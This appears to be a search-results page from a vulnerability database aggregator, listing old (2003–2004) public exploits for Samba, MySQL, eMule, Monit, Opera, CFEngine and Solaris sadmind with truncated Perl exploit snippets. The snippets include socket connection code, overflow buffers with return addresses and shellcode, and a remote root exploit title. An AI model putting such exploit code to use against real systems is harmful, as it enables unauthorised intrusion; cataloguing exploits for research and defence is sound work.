Lucene search
K

1086 matches found

exploitpack
exploitpack
added 2004/07/22 12:0 a.m.16 views

Samba 3.0.4 - SWAT Authorisation Buffer Overflow

Samba 3.0.4 - SWAT Authorisation Buffer Overflow !/usr/bin/perl Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow Created by Noam Rathaus of Beyond Security Ltd. use IO::Socket; use strict; my $host = $ARGV0; my $remote = IO::Socket::INET-new Proto = "tcp", PeerAddr = $host, PeerPort =...

0.7AI score
Exploits0
Exploit DB
Exploit DB
added 2004/07/10 12:0 a.m.103 views

MySQL 4.1/5.0 - Zero-Length Password Authentication Bypass

!/usr/bin/perl The script connects to MySQL and attempts to log in using a zero-length password Based on the vuln found by NGSSecurity The following Perl script can be used to test your version of MySQL. It will display the login packet sent to the server and it's reply. Exploit copyright c 2004 ...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2004/07/10 12:0 a.m.13 views

MySQL 4.15.0 - Zero-Length Password Authentication Bypass

MySQL 4.15.0 - Zero-Length Password Authentication Bypass !/usr/bin/perl The script connects to MySQL and attempts to log in using a zero-length password Based on the vuln found by NGSSecurity The following Perl script can be used to test your version of MySQL. It will display the login packet se...

0.4AI score
Exploits0
0day.today
0day.today
added 2004/05/16 12:0 a.m.26 views

eMule 0.42e Remote Denial of Service Exploit

Exploit for unknown platform in category dos / poc ============================================ eMule 0.42e Remote Denial of Service Exploit ============================================ !/usr/bin/perl system"cls"; Emule 0.42e Remote Denial Of Service Exploit Coded by Rafel Ivgi, The-Insider usage...

7AI score
Exploits0
exploitpack
exploitpack
added 2004/05/16 12:0 a.m.11 views

Emule 0.42e - Remote Denial of Service

Emule 0.42e - Remote Denial of Service !/usr/bin/perl system"cls"; Emule 0.42e Remote Denial Of Service Exploit Coded by Rafel Ivgi, The-Insider usage: perl emule042e.pl use IO::Socket; my $host = $ARGV0; my $port = $ARGV1; my $times = $ARGV2; if $host unless$port $port="4711"; unless$times...

0.1AI score
Exploits0
Exploit DB
Exploit DB
added 2004/05/16 12:0 a.m.35 views

Emule 0.42e - Remote Denial of Service

!/usr/bin/perl system"cls"; Emule 0.42e Remote Denial Of Service Exploit Coded by Rafel Ivgi, The-Insider usage: perl emule042e.pl use IO::Socket; my $host = $ARGV0; my $port = $ARGV1; my $times = $ARGV2; if $host unless$port $port="4711"; unless$times $times="50"; print "Emule 0.42e Remote Denia...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2004/05/11 12:0 a.m.29 views

Emule 0.42e Remote Denial Of Service Exploit

!/usr/bin/perl system"cls"; Emule 0.42e Remote Denial Of Service Exploit Coded by Rafel Ivgi, The-Insider: http://theinsider.deep-ice.com usage: perl emule042e.pl host port how many times use IO::Socket; my $host = $ARGV0; my $port = $ARGV1; my $times = $ARGV2; if $host unless$port $port="4711";...

0.2AI score
Exploits0
Packet Storm
Packet Storm
added 2004/04/25 12:0 a.m.54 views

Kreset.pl

Well, I thought I was the first to release some of this but i see places like k-otik already have some C code. Here is some perl code that will reset a connection, it takes a port range that can be used as the source IP's port range, or the destination ip's port range it assumes you at least no t...

5CVSS9AI score0.09318EPSS
Exploits3
0day.today
0day.today
added 2004/04/09 12:0 a.m.12 views

Monit <= 4.1 Remote Root Buffer Overflow Exploit

Exploit for linux platform in category remote exploits ================================================ Monit \n\n"; exit0; print "HOST:\t$ARGV0\n"; print "PORT:\t2812\n"; my $buffer = "B" x 284 . "\xcf\x89\xb3\x40" . $shellcode; esp mandrake 9.1 my $buffer = "A" x 284 . "XXXX" . "B" x 100; dos a...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2004/04/09 12:0 a.m.12 views

Monit 4.1 - Remote Buffer Overflow

Monit 4.1 - Remote Buffer Overflow !/usr/bin/perl monit \n\n"; exit0; print "HOST:\t$ARGV0\n"; print "PORT:\t2812\n"; my $buffer = "B" x 284 . "\xcf\x89\xb3\x40" . $shellcode; esp mandrake 9.1 my $buffer = "A" x 284 . "XXXX" . "B" x 100; dos and debug print "connecting to server...\n"; $socket =...

0.8AI score
Exploits0
Packet Storm
Packet Storm
added 2004/04/09 12:0 a.m.17 views

cobain-monit.pl

!/usr/bin/perl cobain-monit.pl monit \n\n"; exit0; print "HOST:\t$ARGV0\n"; print "PORT:\t2812\n"; my $buffer = "B" x 284 . "\xcf\x89\xb3\x40" . $shellcode; esp mandrake 9.1 my $buffer = "A" x 284 . "XXXX" . "B" x 100; dos and debug print "connecting to server...\n"; $socket = IO::Socket::INET -...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2004/01/21 12:0 a.m.23 views

Apache 2.0.4x mod_perl - File Descriptor Leakage (3)

source: https://www.securityfocus.com/bid/9471/info A vulnerability has been reported to exist in the Apache modperl module that may allow local attackers to gain access to privileged file descriptors. This issue could be exploited by an attacker to hijack a vulnerable server daemon. Other attack...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2003/12/18 12:0 a.m.22 views

SiteInteractive Subscribe Me - Setup.pl Arbitrary Command Execution

SiteInteractive Subscribe Me - Setup.pl Arbitrary Command Execution source: https://www.securityfocus.com/bid/9253/info It has been reported that the SiteInteractive Subscribe Me setup.pl script lacks sufficient sanitization on user-supplied URI parameters; an attacker may invoke this script...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2003/12/18 12:0 a.m.22 views

Cross-site scripting vulnerability in SARA v&lt;=4.2.7

XSS Vulnerability in Security Auditor's Research Assistant SARA versions before 5.0.0 Affects: SARA versions 4.2.6 and 4.2.7. Older versions not tested, presumably affected. Related software sharing common ancestry: SATAN 1.1.1 would not run properly on my test platform, but checking the code it...

0.6AI score
Exploits0
exploitpack
exploitpack
added 2003/11/22 12:0 a.m.15 views

Opera 7.22 - File Creation and Execution (WebServer)

Opera 7.22 - File Creation and Execution WebServer !/usr/bin/perl Sample code of "Opera 7 Arbitrary File Auto-Saved Vulnerability." This Exploit will run a webserver that will create and execute a batch file on the victim's computer when visiting this malicious server This perl script is a small...

7.5AI score
Exploits0
seebug.org
seebug.org
added 2003/11/22 12:0 a.m.12 views

Opera 7.22 File Creation and Execution Exploit (Malicious Webserver)

No description provided by source. !/usr/bin/perl Sample code of "Opera 7 Arbitrary File Auto-Saved Vulnerability." This Exploit will run a webserver that will create and execute a batch file on the victim's computer when visiting this malicious server This perl script is a small HTTP server for ...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2003/11/15 12:0 a.m.21 views

Opera 7.x - Directory Traversal

source: https://www.securityfocus.com/bid/9279/info Opera is prone to a file corruption vulnerability. This issue is exposed when a user is presented with a file dialog, which will cause the creation of a temporary file. It is possible to specify a relative path to another file on the system usin...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2003/09/27 12:0 a.m.14 views

GNU CFEngine 2.-2.0.3 - Remote Stack Overflow

GNU CFEngine 2.-2.0.3 - Remote Stack Overflow !/usr/bin/perl -s kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003. forking portbind shellcode port=0xb0ef45295 by eSDee bug discovered by nick cleaton, tested on FreeBSD 4.8-RELEASE use IO::Socket; if!$ARGV1 print "usage:...

0.5AI score
Exploits0
0day.today
0day.today
added 2003/09/27 12:0 a.m.18 views

GNU Cfengine 2.-2.0.3 Remote Stack Overflow Exploit

Exploit for bsd platform in category remote exploits =================================================== GNU Cfengine 2.-2.0.3 Remote Stack Overflow Exploit =================================================== !/usr/bin/perl -s kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003...

7.1AI score
Exploits0
0day.today
0day.today
added 2003/09/19 12:0 a.m.14 views

Solaris Sadmind Default Configuration Remote Root Exploit

Exploit for solaris platform in category remote exploits ========================================================= Solaris Sadmind Default Configuration Remote Root Exploit ========================================================= !/usr/bin/perl -w Title: rootdown.pl Purpose: Solaris Remote comma...

7.1AI score
Exploits0
Rows per page
Query Builder